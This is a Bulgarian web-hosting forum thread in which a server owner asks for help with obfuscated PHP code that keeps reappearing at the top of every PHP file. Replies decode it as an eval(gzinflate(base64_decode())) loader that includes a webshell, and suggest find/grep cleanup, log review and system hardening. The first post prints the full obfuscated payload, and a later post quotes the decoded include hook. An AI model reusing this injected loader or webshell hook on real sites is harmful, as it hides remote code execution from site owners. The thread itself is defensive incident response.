Изпечатай

[mishot]

Здравейте,
имам следния проблем:
По някакъв начин(още не съм разбрал как) в началото на всеки php файл се добавя следния код:
<?php
$md5 = "0920e84df32218bdeb31c1c2ae0cf0fc";
$a3 = array('(','d',"4",'$','t',";",'c','e','r','l',"z",')',"i",'6','n',"f","b","o",'a','s','g',"_",'v');
$b33 = create_function('$'.'v',$a3[7].$a3[22].$a3[18].$a3[9].$a3[0].$a3[20].$a3[10].$a3[12].$a3[14].$a3[15].$a3[9].$a3[18].$a3[4].$a3[7].$a3[0].$a3[16].$a3[18].$a3[19].$a3[7].$a3[13].$a3[2].$a3[21].$a3[1].$a3[7].$a3[6].$a3[17].$a3[1].$a3[7].$a3[0].$a3[3].$a3[22].$a3[11].$a3[11].$a3[11].$a3[5]);
$b33('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');
?>

Не знам какво точно прави кода, но спира правилната работа на сайтовете.
Вчера възстанових всички сайтове от бекъпа и всичко си работеше добре. Днес сутринта кода беше добавен отново навсякъде.

Някакви идеи как да го спра? Вирус ли е някакъв?
Дайте идея, как да проверя рекурсивно във всички php файлове за, да речем низа b33(да съм сигурен, че кода не е останал някъде)
clamav и rkhunter - не откриват нищо

Сървъра е с Fedora 14, httpd-2.2.17-1

едит:

сега забелязах в логовете, че се опитват да влязат през proftp с различни потребители(някаква база ползват явно, защото потребителите са в азбучен ред) - спрях proftpd

[clovenhoof]

Код:

$b33 = create_function('$'.'v',$a3[7].$a3[22].$a3[18].$a3[9].$a3[0].$a3[20].$a3[10].$a3[12].$a3[14].$a3[15].$a3[9].$a3[18].$a3[4].$a3[7].$a3[0].$a3[16].$a3[18].$a3[19].$a3[7].$a3[13].$a3[2].$a3[21].$a3[1].$a3[7].$a3[6].$a3[17].$a3[1].$a3[7].$a3[0].$a3[3].$a3[22].$a3[11].$a3[11].$a3[11].$a3[5]);

Горното всъщност е: eval(gzinflate(base64_decode($v))); Създава функция която се извиква на следващият ред:

$b33('DZa.....

Аргумента е код който eval изпълнява при всяко зареждане на страницата и понеже е криптиран (аргумента/кода) не се разбира какво точно прави.

Може да си направиш малък пример и да изпълниш gzinflate(base64_decode($v)) на PHP и да го echo-неш за да видиш какъв код се изпълнява без твоето желание.

ПП: Т.е. с echo няма директно да стане, но има начини да покажеш PHP код като текст на уеб страница.

[Neo2SHYAlien]

За да си провериш всички файлове за b33 пробвай това

Код

GeSHi (Bash):
find / -type f -print0 | xargs -0 grep -l "b33"

[neter]

Няма нужда да се търси 'b33' на този етап - дори да си почистиш кода от тази функция, пак ще ти го добавят. Направо да видим кода (и без това си е публикуван тук), за да говорим нататък

Код

GeSHi (PHP):
if (function_exists('ob_start') && !isset($GLOBALS['mfsn'])) {
	$GLOBALS['mfsn'] = '/var/www/html/wizitka/new/templates/vertikalni/5/pharmacy/26f.php';
	if (file_exists($GLOBALS['mfsn'])) {
		include_once($GLOBALS['mfsn']);
		if (function_exists('gml') && function_exists('dgobh')) {
			ob_start('dgobh');
		}
	}
}

Виж какво има в указания файл. Сподели и с нас, ако нямаш някаква пречка. След това ще е нужно здраво да се заровиш в логовете на всички услуги (включително и ssh), които имаш (си имал) пуснати на тази машина, и да се опиташ да намериш къде и с какво се е случило влизането. Някъде имаш оставена вратичка, но ще ни е малко трудно така на сляпо да те упътим къде е.

[Neo2SHYAlien]

Няма нужда да се търси 'b33' на този етап - дори да си почистиш кода от тази функция, пак ще ти го добавят.

Поне може да види от къде влиза ако е четим файла или ако не е използван base64 иначе дам няма много смисъл.

[niakoi]

имах подобен проблем преди 2-3 години. колежката имаше вирусче, имаше си запазени пароли за фтп на сайта ни и... така

по-скоро виж кой юзър (ако имаш възможност) го е променял за последно

поздрави
нас

[mishot]

Няма нужда да се търси 'b33' на този етап - дори да си почистиш кода от тази функция, пак ще ти го добавят. Направо да видим кода (и без това си е публикуван тук), за да говорим нататък

Код

GeSHi (PHP):
if (function_exists('ob_start') && !isset($GLOBALS['mfsn'])) {
	$GLOBALS['mfsn'] = '/var/www/html/wizitka/new/templates/vertikalni/5/pharmacy/26f.php';
	if (file_exists($GLOBALS['mfsn'])) {
		include_once($GLOBALS['mfsn']);
		if (function_exists('gml') && function_exists('dgobh')) {
			ob_start('dgobh');
		}
	}
}

Виж какво има в указания файл. Сподели и с нас, ако нямаш някаква пречка. След това ще е нужно здраво да се заровиш в логовете на всички услуги (включително и ssh), които имаш (си имал) пуснати на тази машина, и да се опиташ да намериш къде и с какво се е случило влизането. Някъде имаш оставена вратичка, но ще ни е малко трудно така на сляпо да те упътим къде е.

Няма как да видя какво съдържа файла, защото директорията NEW беше временна, за одобрения на няколко вертикални темплейта и сутринта я затрих, за да не я възстановявам и нея.

това видях засега в лога:
Sep  4 04:39:45 webserver proftpd[21621]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER aaron: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 04:39:47 webserver proftpd[21622]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abbott: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 04:39:48 webserver proftpd[21623]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abel: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 04:39:50 webserver proftpd[21624]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abner: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 04:39:52 webserver proftpd[21625]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abraham: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 07:54:49 webserver proftpd[23156]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER aaron: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 07:54:51 webserver proftpd[23157]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abbott: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 07:54:53 webserver proftpd[23158]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abel: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]
Sep  4 07:54:55 webserver proftpd[23159]: 127.0.0.1 (::ffff:61.160.211.4[::ffff:61.160.211.4]) - USER abner: no such user found from ::ffff:61.160.211.4 [::ffff:61.160.211.4]

това е част от лога, започват от A-Z(всякакви комбинации)

изхода от nmap:

#  nmap -v 192.168.0.1

Starting Nmap 5.21 ( http://nmap.org ) at 2012-09-05 10:56 EEST
Initiating Parallel DNS resolution of 1 host. at 10:56
Completed Parallel DNS resolution of 1 host. at 10:56, 0.00s elapsed
Initiating SYN Stealth Scan at 10:56
Scanning 192.168.0.1 [1000 ports]
Discovered open port 443/tcp on 192.168.0.1
Discovered open port 111/tcp on 192.168.0.1
Discovered open port 139/tcp on 192.168.0.1
Discovered open port 445/tcp on 192.168.0.1
Discovered open port 80/tcp on 192.168.0.1
Discovered open port 3306/tcp on 192.168.0.1
Discovered open port 3128/tcp on 192.168.0.1
Completed SYN Stealth Scan at 10:56, 0.03s elapsed (1000 total ports)
Nmap scan report for 192.168.0.1
Host is up (0.0000090s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
3128/tcp open  squid-http
3306/tcp open  mysql

До момента съм спрял FTP сървъра и съм забранил всички потребители, които имат отношение.

За да си провериш всички файлове за b33 пробвай това

Код

GeSHi (Bash):
find / -type f -print0 | xargs -0 grep -l "b33"

Има ли как да търси само в php файлове?
Как да видя всички php модифицирани на определена дата?

Благодаря предварително на всички!

[morbid_viper]

случва се от време на време с някоя купешка платворма за форум, блог, CMS  или нещо подобно. оставил си някоя стара версия и като са я надушили са получили достъп до файловата ти система.
това може да се поограничи като смениш правата на файловете, които се сервират да са с други права от потребителя, с който работи уеб сървъра. поне да не може да се пише с wwwrun (да речем).
естествено, това не винаги е приложимо. просто не знам как използваш сървъра си. ако трябва 100 човека да качват някакви неща през уеб си е по-пипкаво да се занимаваш с правата.
при нас всички такива „външни“ системи са отделени на други машини

[Neo2SHYAlien]

Има ли как да търси само в php файлове?

Код

GeSHi (Bash):
find / -name '*.php' -type f -print0 | xargs -0 grep -l "b33"

Добра идея е да ползваш modsecurity

[mishot]

това е файла

[n00b]

тъй като съм сърбал тази попара... вижте да не би да са влезли през phpmyadmin. Бедния има МНОГО дупки!!!

[neter]

това е файла

Мда, webshell-че, очакваше се. През него са добавяли по-горната функция към PHP файловете, след като си я махал. Остава да намериш откъде е качен. Ако нямаш някаква функционалност на сайта, свързана с качване на файлове, и ако нямаш публичен достъп до административни инструменти като phpmyadmin, webmin и т.н., то първо търси следата някъде из FTP логовете (между другото, ProFTPD също има някоя и друга дупка в сигурността). Ако намериш следа там, спираш FTP сървъра (вече си го направил), изчистваш си кода от проблемната функция по гореописаните начини с find и приключваш с въпроса засега. Ако не намериш никаква следа в FTP-то, почва едно голямо търсене на дупка в кода на сайта. Ако е някаква готова CMS система, по-добре инсталирай на чисто последната версия (надяваме се, че текущата дупка я няма в тази версия). Надграждането (вместо чиста нова инсталация на CMS-a) в някои случаи може да остави дупка от старата версия и в новата версия (този риск предимно идва от инсталираните добавки към CMS-а). Ако сайтът ти е писан от някого, на когото си платил, даваш му задачата да търси дупката. Ако сам си си го писал или считаш, че имаш достатъчно познания да се ровиш в чужд код, ти пожелавам успех

П.П.: А, и не забравяй все пак да махнеш файла на webshell-а! Потърси го и в други копия из папките. Смело можеш да хванеш някакъв текст от оригиналния файл и да търсиш за файлове със същия текст - съдържанието на всички файлове с webshell най-вероятно ще е едно и също - кракерите обикновено качват само по един webshell. И едва ли има нужда да претърсваш цялата файлова система - засега не си казал за признаци да е действано нещо извън папките, до които Apache потребителят има достъп за писане.

[Neo2SHYAlien]

Освен дупката е добре да повишиш сигурността в системата си, има много начини и ако са се добрали до root достъп ще стане кочинка. Виждам че си със стара версия на федорка за нея пускат ли се пачове по сигурността ??

[ddantgwyn]

Освен дупката е добре да повишиш сигурността в системата си, има много начини и ако са се добрали до root достъп ще стане кочинка. Виждам че си със стара версия на федорка за нея пускат ли се пачове по сигурността ??

ами отдавна не.

аз бих попитал дали сървъра е в продукция, защото ако не е, по-добре да изключва брутално машината от мрежата и да се захваща да прави пълна ревизия на системата. а ако не му се занимава, направо да я забърсва и да инсталира един centos 6.3 на мястото на Fedora. а ако машината е в продукция -- да слагат временно някаква на нейно място (ако нямат равностойна замяна) и пак да използват centos. ревизията е интересна да се разбере какво и как точно са пробили, но Fedora 14 беше на дневен ред преди почти две години, така че аз не бих проявил чак такъв академичен интерес, особено ако машината е важна и трябва да е непрекъснато на линия.

предлагам centos защото той е най-близко до fedora, но при добро желание може да използват и Red Hat EL

[Neo2SHYAlien]

ами отдавна не.

Лошо в такъв случай може някой дупкав сървис да са изчаластрили спокойно.

//off
Много ме дразнят тия RHEL производни че не позволяват dist-upgrade